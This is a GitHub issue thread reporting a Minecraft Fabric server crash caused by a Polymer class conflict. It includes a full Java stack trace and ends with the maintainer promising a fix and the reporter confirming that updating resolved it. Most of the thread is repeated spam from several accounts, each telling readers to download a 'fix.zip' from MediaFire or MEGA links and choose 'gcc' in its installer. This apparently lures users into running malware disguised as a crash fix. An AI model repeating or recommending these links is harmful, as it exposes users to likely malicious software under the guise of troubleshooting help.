### ISSUE TITLE
Crash with Polymer 0.9.11

### ISSUE THREAD

**Issue by noiverre** [tomalbrc/filament#3]
https://github.com/MykhailoOpryshok/Borukva-Food/issues/9

```
[07:25:14] [main/ERROR]: Failed to start the minecraft server
java.lang.RuntimeException: Could not execute entrypoint stage 'main' due to errors, provided by 'borukva-food' at 'com.opryshok.BorukvaFood'!
	at net.fabricmc.loader.impl.FabricLoaderImpl.lambda$invokeEntrypoints$2(FabricLoaderImpl.java:403) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.util.ExceptionUtil.gatherExceptions(ExceptionUtil.java:33) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:401) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.game.minecraft.Hooks.startServer(Hooks.java:63) ~[fabric-loader-0.16.2.jar:?]
	at net.minecraft.server.Main.main(Main.java:111) [server-intermediary.jar:?]
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480) [fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74) [fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.knot.KnotServer.main(KnotServer.java:23) [fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.server.FabricServerLauncher.main(FabricServerLauncher.java:69) [fabric-loader-0.16.2.jar:?]
	at net.fabricmc.installer.ServerLauncher.main(ServerLauncher.java:69) [server.jar:1.0.1]
	Suppressed: java.lang.ClassFormatError: Duplicate field name "TRIPWIRE_BLOCK" with signature "Leu.pb4.polymer.blocks.api.BlockModelType;" in class file eu/pb4/polymer/blocks/api/BlockModelType
		at java.base/java.lang.ClassLoader.defineClass1(Native Method) ~[?:?]
		at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1027) ~[?:?]
		at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150) ~[?:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.defineClassFwd(KnotClassLoader.java:160) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.tryLoadClass(KnotClassDelegate.java:355) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.loadClass(KnotClassDelegate.java:218) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.loadClass(KnotClassLoader.java:119) ~[fabric-loader-0.16.2.jar:?]
		at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:526) ~[?:?]
		at com.zefir.borukvautils.data.Models.init(Models.java:22) ~[borukvautils-0.1.1.jar:?]
		at com.zefir.borukvautils.BorukvaUtils.onInitialize(BorukvaUtils.java:17) ~[borukvautils-0.1.1.jar:?]
		at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:399) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.game.minecraft.Hooks.startServer(Hooks.java:63) ~[fabric-loader-0.16.2.jar:?]
		at net.minecraft.server.Main.main(Main.java:111) [server-intermediary.jar:?]
		at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotServer.main(KnotServer.java:23) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.server.FabricServerLauncher.main(FabricServerLauncher.java:69) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.installer.ServerLauncher.main(ServerLauncher.java:69) [server.jar:1.0.1]
	Suppressed: java.lang.ClassFormatError: Duplicate field name "TRIPWIRE_BLOCK" with signature "Leu.pb4.polymer.blocks.api.BlockModelType;" in class file eu/pb4/polymer/blocks/api/BlockModelType
		at java.base/java.lang.ClassLoader.defineClass1(Native Method) ~[?:?]
		at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1027) ~[?:?]
		at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150) ~[?:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.defineClassFwd(KnotClassLoader.java:160) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.tryLoadClass(KnotClassDelegate.java:355) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.loadClass(KnotClassDelegate.java:218) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.loadClass(KnotClassLoader.java:119) ~[fabric-loader-0.16.2.jar:?]
		at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:526) ~[?:?]
		at de.tomalbrc.filament.util.Json.<clinit>(Json.java:40) ~[filament-0.5.2+1.21.jar:?]
		at de.tomalbrc.filament.util.FilamentConfig.load(FilamentConfig.java:42) ~[filament-0.5.2+1.21.jar:?]
		at de.tomalbrc.filament.Filament.onInitialize(Filament.java:27) ~[filament-0.5.2+1.21.jar:?]
		at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:399) ~[fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.game.minecraft.Hooks.startServer(Hooks.java:63) ~[fabric-loader-0.16.2.jar:?]
		at net.minecraft.server.Main.main(Main.java:111) [server-intermediary.jar:?]
		at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.knot.KnotServer.main(KnotServer.java:23) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.loader.impl.launch.server.FabricServerLauncher.main(FabricServerLauncher.java:69) [fabric-loader-0.16.2.jar:?]
		at net.fabricmc.installer.ServerLauncher.main(ServerLauncher.java:69) [server.jar:1.0.1]
Caused by: java.lang.ClassFormatError: Duplicate field name "TRIPWIRE_BLOCK" with signature "Leu.pb4.polymer.blocks.api.BlockModelType;" in class file eu/pb4/polymer/blocks/api/BlockModelType
	at java.base/java.lang.ClassLoader.defineClass1(Native Method) ~[?:?]
	at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1027) ~[?:?]
	at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150) ~[?:?]
	at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.defineClassFwd(KnotClassLoader.java:160) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.tryLoadClass(KnotClassDelegate.java:355) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.knot.KnotClassDelegate.loadClass(KnotClassDelegate.java:218) ~[fabric-loader-0.16.2.jar:?]
	at net.fabricmc.loader.impl.launch.knot.KnotClassLoader.loadClass(KnotClassLoader.java:119) ~[fabric-loader-0.16.2.jar:?]
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:526) ~[?:?]
	at com.opryshok.utils.TransparentBlock.<clinit>(TransparentBlock.java:14) ~[borukva-food-0.1.3.jar:?]
	at com.opryshok.block.ModBlocks.<clinit>(ModBlocks.java:36) ~[borukva-food-0.1.3.jar:?]
	at com.opryshok.item.ModItems.<clinit>(ModItems.java:22) ~[borukva-food-0.1.3.jar:?]
	at com.opryshok.BorukvaFood.onInitialize(BorukvaFood.java:41) ~[borukva-food-0.1.3.jar:?]
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:399) ~[fabric-loader-0.16.2.jar:?]
	... 7 more
```

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by tomalbrc** [comment]
Yes, will release an update in a few hours, thanks for the report :)

**Comment by noiverre** [comment]
Updated to latest filament version along with other mods' libraries, everything works fine
